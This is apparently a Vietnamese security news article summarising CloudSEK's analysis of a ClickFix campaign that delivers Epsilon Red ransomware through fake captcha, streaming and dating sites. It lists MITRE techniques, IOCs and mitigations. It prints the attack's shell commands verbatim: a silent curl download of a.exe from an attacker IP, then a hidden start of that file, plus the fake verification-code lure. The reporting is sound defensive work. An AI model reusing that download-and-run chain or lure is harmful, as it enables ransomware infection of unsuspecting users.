Nhóm nghiên cứu TRIAD của CloudSEK đã phát hiện một trang web đang được phát triển, triển khai mã độc có chủ đề Clickfix liên quan đến Epsilon Red ransomware. Biến thể mã độc này cho thấy sự thay đổi trong các chiến thuật lây nhiễm truyền thống.
Thay vì sử dụng phương pháp tiêm lệnh dựa trên clipboard, mã độc Epsilon Red hiện tại chuyển hướng nạn nhân đến một trang phụ trên cùng tên miền. Tại đây, các lệnh shell độc hại được thực thi một cách âm thầm thông qua ActiveXObject(“WScript.Shell”).
Cơ Chế Khai Thác Và Phân Phối Payload
Kịch bản độc hại tận dụng Windows Command Shell (cmd.exe) để thực thi ẩn. Nó bắt đầu bằng cách chuyển đến thư mục người dùng với lệnh “cd /D %userprofile%”.
Tiếp theo, một lệnh curl được thực thi âm thầm để tải xuống một tệp nhị phân từ địa chỉ IP do kẻ tấn công kiểm soát. Tệp này được lưu dưới dạng a.exe và sau đó chạy ẩn với tham số ‘0’ để ngăn chặn bất kỳ cửa sổ nào xuất hiện.
cd /D %userprofile%
curl -s -o a.exe http://155.94.155.227:2269/a.exe
start /b a.exe 0Quá trình này dẫn đến việc triển khai Epsilon Red ransomware, được xác định bởi MD5 hash 98107c01ecd8b7802582d404e007e493.
Kỹ Thuật Đánh Lừa Và Kỹ Thuật Xã Hội
Để tăng cường khả năng che giấu, kịch bản hiển thị một thông báo xác minh giả mạo thông qua lệnh “echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause”. Thông báo này cố tình chứa lỗi chính tả để bắt chước hành vi nghiệp dư, không đe dọa.
Việc giữ cửa sổ command prompt mở để người dùng tương tác giúp củng cố chiêu trò kỹ thuật xã hội. Theo gbhackers.com, hơn 2000 thiết bị đã bị xâm nhập bởi các chiến dịch khai thác kỹ thuật xã hội tương tự. (Nguồn: https://gbhackers.com/over-2000-devices-compromised-by-weaponized-social-security/)
Mở Rộng Hệ Sinh Thái Mạo Danh
Phân tích sâu hơn cơ sở hạ tầng liên quan đã tiết lộ một hệ sinh thái mạo danh rộng lớn hơn. Các phiên bản giả mạo của Discord Captcha Bot (captcha.bot), các nền tảng streaming như Kick, Twitch, Rumble và OnlyFans đều được sử dụng.
Ngoài ra, các chiêu trò hẹn hò trực tuyến cũng được thiết kế để phân phối các payload Windows thông qua cơ chế Clickfix. Các trang web này khai thác lòng tin của người dùng vào các dịch vụ quen thuộc.
Chúng thúc đẩy người dùng nhấp vào các nút xác minh, kích hoạt quá trình thực thi lệnh dựa trên JavaScript mà không cần tương tác rõ ràng.
Phân Tích Theo Khung MITRE ATT&CK
Chiến dịch này phù hợp với nhiều kỹ thuật của MITRE ATT&CK:
- T1189 (Drive-by Compromise): Được sử dụng cho bước truy cập ban đầu.
- T1059.003 (Windows Command Shell) và T1059.005 (JavaScript/VBScript): Áp dụng cho quá trình thực thi mã độc.
- T1204.001 (Malicious Link): Dùng để thao túng người dùng, thúc đẩy hành động nguy hiểm.
Kỹ Thuật Né Tránh Phòng Thủ
Việc né tránh phòng thủ được thực hiện thông qua các kỹ thuật sau:
- T1027 (Obfuscated Files or Information): Thông qua các bản tải xuống âm thầm.
- T1036 (Masquerading): Bằng cách sử dụng các giao diện có vẻ lành tính để che giấu mục đích thực sự.
Khả năng duy trì quyền truy cập (persistence) được dự kiến liên quan đến T1053.005 (Scheduled Task/Job). Hoạt động command and control (C2) diễn ra qua T1071.001 (Web Protocols) sử dụng HTTP, dẫn đến T1486 (Data Encrypted for Impact) trong giai đoạn mã độc tống tiền.
Đặc Điểm Và Sự Tinh Vi Của Epsilon Red Ransomware
Epsilon Red ransomware, lần đầu tiên được quan sát vào năm 2021, lấy cảm hứng lỏng lẻo từ REvil trong phong cách ghi chú đòi tiền chuộc, với một số chỉnh sửa nhỏ về ngữ pháp. Tuy nhiên, nó thiếu sự chồng lấn sâu sắc về mặt chiến thuật hoặc cơ sở hạ tầng với REvil.
Sự tinh vi của chiến dịch này nằm ở việc lạm dụng ActiveX để thực thi mã từ xa (remote code execution) trực tiếp từ các phiên duyệt web. Điều này giúp bỏ qua các biện pháp bảo vệ tải xuống thông thường.
Cơ chế này cho phép xâm nhập điểm cuối (endpoint compromise) ngay từ đầu, tạo tiền đề cho việc di chuyển ngang (lateral movement) và mã hóa toàn bộ dữ liệu. Báo cáo của CloudSek cũng nhấn mạnh rằng việc mạo danh thương hiệu làm giảm đáng kể sự nghi ngờ của người dùng, làm tăng tỷ lệ lây nhiễm.
Việc tái sử dụng liên tục các trang phân phối theo chủ đề cho thấy đây là một hoạt động được lên kế hoạch kỹ lưỡng và lâu dài. (Nguồn: https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware)
Các Chỉ Báo Thỏa Hiệp (IOCs)
Các chỉ báo thỏa hiệp liên quan đến chiến dịch tấn công mạng này bao gồm:
- MD5 Hash của Epsilon Red ransomware: 98107c01ecd8b7802582d404e007e493
- MD5 Hash của Quasar RAT: 2db32339fa151276d5a40781bc8d5eaa
- Địa chỉ IP (C2 cho a.exe): 155.94.155.227:2269
- Địa chỉ IP (C2 cho Quasar RAT): 213.209.150.188:8112
- Tên miền độc hại (HTA files): twtich.cc
- Tên miền độc hại (Clickfix delivery): capchabot.cc
Biện Pháp Giảm Thiểu Và Phòng Vệ
Để giảm thiểu rủi ro từ các mối đe dọa như Epsilon Red ransomware và các chiến dịch Clickfix, các tổ chức nên thực hiện các biện pháp sau nhằm tăng cường bảo mật mạng:
- Vô hiệu hóa ActiveX và Windows Script Host: Sử dụng Group Policies để chặn các vector thực thi lỗi thời này.
- Tích hợp Threat Feeds: Áp dụng danh sách đen cho các IP và tên miền độc hại, bao gồm các chỉ báo tấn công trong tương lai từ các chiến dịch Clickfix.
- Triển khai EDR: Thiết lập các quy tắc phát hiện và phản ứng điểm cuối để giám sát các hoạt động thực thi ẩn, tải xuống curl âm thầm và các tiến trình bất thường được tạo ra từ trình duyệt.
- Đào tạo nâng cao nhận thức bảo mật: Tổ chức các buổi huấn luyện mô phỏng các dịch vụ bị mạo danh để xây dựng khả năng chống chịu của người dùng trước các mối đe dọa kỹ thuật xã hội này.
